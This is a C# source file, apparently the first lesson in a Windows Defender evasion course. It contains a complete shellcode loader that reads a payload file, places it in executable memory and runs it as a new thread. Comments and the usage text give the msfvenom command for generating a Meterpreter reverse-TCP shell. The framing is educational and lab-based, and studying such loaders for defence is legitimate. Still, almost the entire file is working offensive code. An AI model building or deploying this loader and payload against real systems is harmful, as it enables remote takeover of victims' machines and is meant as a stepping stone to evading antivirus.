// ============================================================================
// LOADER 01: Basic Shellcode Loader
// ============================================================================
//
// WHAT THIS DOES:
//   This loader takes shellcode (raw CPU instructions generated by msfvenom)
//   and runs it directly in memory. It allocates a block of memory, copies
//   the shellcode into it, and tells Windows to execute it as a new thread.
//
// WHY THIS IS NEEDED:
//   This is the foundation of every evasion technique. Before you can bypass
//   Defender, you need to understand the basic pattern of running code in
//   memory. This loader WILL get caught by Defender because it uses plain
//   shellcode with no encryption and calls Windows APIs directly. That is
//   intentional. You need to see what gets detected before you can learn
//   how to avoid detection.
//
// EVASION MECHANISM:
//   None. This loader has zero evasion. Defender will catch it because:
//   1. The shellcode bytes match known msfvenom signatures
//   2. The API import pattern (VirtualAlloc + CreateThread) is flagged
//   3. Allocating memory with execute permissions is suspicious
//   This is the baseline that all other loaders improve upon.
//
// REFERENCES:
//   - ired.team: CreateRemoteThread Shellcode Injection
//   - Crypt0ace: Shellcode Injection in C# Part 1
//   - MITRE ATT&CK T1055 (Process Injection)
//   - Document: 05_shellcode_loader.md
//
// BUILD INSTRUCTIONS:
//   On Windows 11 VM with Visual Studio 2022:
//     csc /unsafe /out:loader01.exe 01_shellcode_loader.cs
//   Or using dotnet CLI:
//     dotnet new console -n Loader01
//     (replace Program.cs with this file)
//     dotnet build
//
// USAGE:
//   Generate shellcode on Kali:
//     msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<KALI_IP> LPORT=<PORT> -f csharp
//   Replace the placeholder shellcode bytes below with the output.
//   Compile and run on the Windows 11 target.
//
// ============================================================================

using System;
using System.Runtime.InteropServices;

namespace ShellcodeLoader
{
    class Program
    {
        // ---- Windows API imports ----
        // We need three Windows functions to run shellcode in memory.
        // DllImport tells C# to load these functions from kernel32.dll,
        // which is a core Windows file that handles memory and processes.

        // VirtualAlloc asks Windows to reserve a block of memory for us.
        // We tell it how much memory we need and what permissions it should have.
        // PAGE_EXECUTE_READWRITE (0x40) means we can read, write, and execute code in this memory.
        [DllImport("kernel32.dll", SetLastError = true)]
        static extern IntPtr VirtualAlloc(
            IntPtr lpAddress,        // where to allocate (IntPtr.Zero means let Windows choose)
            uint dwSize,             // how many bytes we need
            uint flAllocationType,   // MEM_COMMIT | MEM_RESERVE = actually reserve and use the memory
            uint flProtect           // memory permissions (read, write, execute)
        );

        // CreateThread tells Windows to start running code at a specific memory address.
        // We point it at our shellcode so Windows executes it.
        [DllImport("kernel32.dll", SetLastError = true)]
        static extern IntPtr CreateThread(
            IntPtr lpThreadAttributes,   // security settings (IntPtr.Zero means default)
            uint dwStackSize,            // stack size (0 means default)
            IntPtr lpStartAddress,       // the memory address where our shellcode lives
            IntPtr lpParameter,          // parameter to pass to the thread (none needed)
            uint dwCreationFlags,        // 0 means start running immediately
            IntPtr lpThreadId            // receives the thread ID (we do not need it)
        );

        // WaitForSingleObject pauses our program until the shellcode thread finishes.
        // Without this, our program would exit immediately and kill the shellcode.
        [DllImport("kernel32.dll", SetLastError = true)]
        static extern uint WaitForSingleObject(
            IntPtr hHandle,      // the thread handle returned by CreateThread
            uint dwMilliseconds  // how long to wait (0xFFFFFFFF means wait forever)
        );

        // ---- Constants ----
        // These are the values we pass to VirtualAlloc.
        // MEM_COMMIT means actually assign physical memory to the block.
        // MEM_RESERVE means reserve the address range so nothing else uses it.
        // PAGE_EXECUTE_READWRITE means the memory block can be read, written to, and executed.
        const uint MEM_COMMIT = 0x1000;
        const uint MEM_RESERVE = 0x2000;
        const uint PAGE_EXECUTE_READWRITE = 0x40;

        static void Main(string[] args)
        {
            // ---- Parse command line arguments ----
            // The shellcode file path is passed as a command line argument.
            // This keeps the loader generic. You generate shellcode separately
            // with msfvenom and save it to a .bin file, then pass the path here.
            if (args.Length < 1)
            {
                Console.WriteLine("Usage: loader01.exe <path_to_shellcode.bin>");
                Console.WriteLine("");
                Console.WriteLine("Generate shellcode on Kali:");
                Console.WriteLine("  msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f raw -o payload.bin");
                return;
            }

            string shellcodePath = args[0];

            // ---- Read shellcode from file ----
            // The shellcode is stored as raw bytes in a .bin file.
            // File.ReadAllBytes reads the entire file into a byte array.
            byte[] shellcode;
            try
            {
                shellcode = System.IO.File.ReadAllBytes(shellcodePath);
            }
            catch (Exception ex)
            {
                Console.WriteLine("Could not read shellcode file: " + ex.Message);
                return;
            }

            Console.WriteLine("[*] Shellcode size: " + shellcode.Length + " bytes");

            // ---- Step 1: Allocate memory ----
            // VirtualAlloc reserves a block of memory big enough to hold our shellcode.
            // IntPtr.Zero means we let Windows choose where in memory to place it.
            // MEM_COMMIT | MEM_RESERVE means we both reserve the address space and
            // assign actual physical memory to it.
            // PAGE_EXECUTE_READWRITE means we can write shellcode to it AND execute it.
            IntPtr memoryAddress = VirtualAlloc(
                IntPtr.Zero,
                (uint)shellcode.Length,
                MEM_COMMIT | MEM_RESERVE,
                PAGE_EXECUTE_READWRITE
            );

            // If VirtualAlloc returns zero, the allocation failed.
            if (memoryAddress == IntPtr.Zero)
            {
                Console.WriteLine("[-] Memory allocation failed.");
                return;
            }

            Console.WriteLine("[+] Memory allocated at: 0x" + memoryAddress.ToString("X"));

            // ---- Step 2: Copy shellcode into allocated memory ----
            // Marshal.Copy takes our byte array (the shellcode) and copies it
            // byte by byte into the memory block we just allocated.
            // After this, the shellcode is sitting in executable memory.
            Marshal.Copy(shellcode, 0, memoryAddress, shellcode.Length);
            Console.WriteLine("[+] Shellcode copied to memory.");

            // ---- Step 3: Execute the shellcode ----
            // CreateThread creates a new thread that starts executing at memoryAddress.
            // Since memoryAddress points to our shellcode, Windows will start
            // running our shellcode instructions.
            IntPtr threadHandle = CreateThread(
                IntPtr.Zero,
                0,
                memoryAddress,
                IntPtr.Zero,
                0,
                IntPtr.Zero
            );

            if (threadHandle == IntPtr.Zero)
            {
                Console.WriteLine("[-] Thread creation failed.");
                return;
            }

            Console.WriteLine("[+] Thread created. Shellcode is running.");

            // ---- Step 4: Wait for shellcode to finish ----
            // 0xFFFFFFFF means wait indefinitely. Our program will stay alive
            // as long as the shellcode thread is running. If the shellcode is
            // a reverse shell, this keeps the connection alive.
            WaitForSingleObject(threadHandle, 0xFFFFFFFF);
        }
    }
}
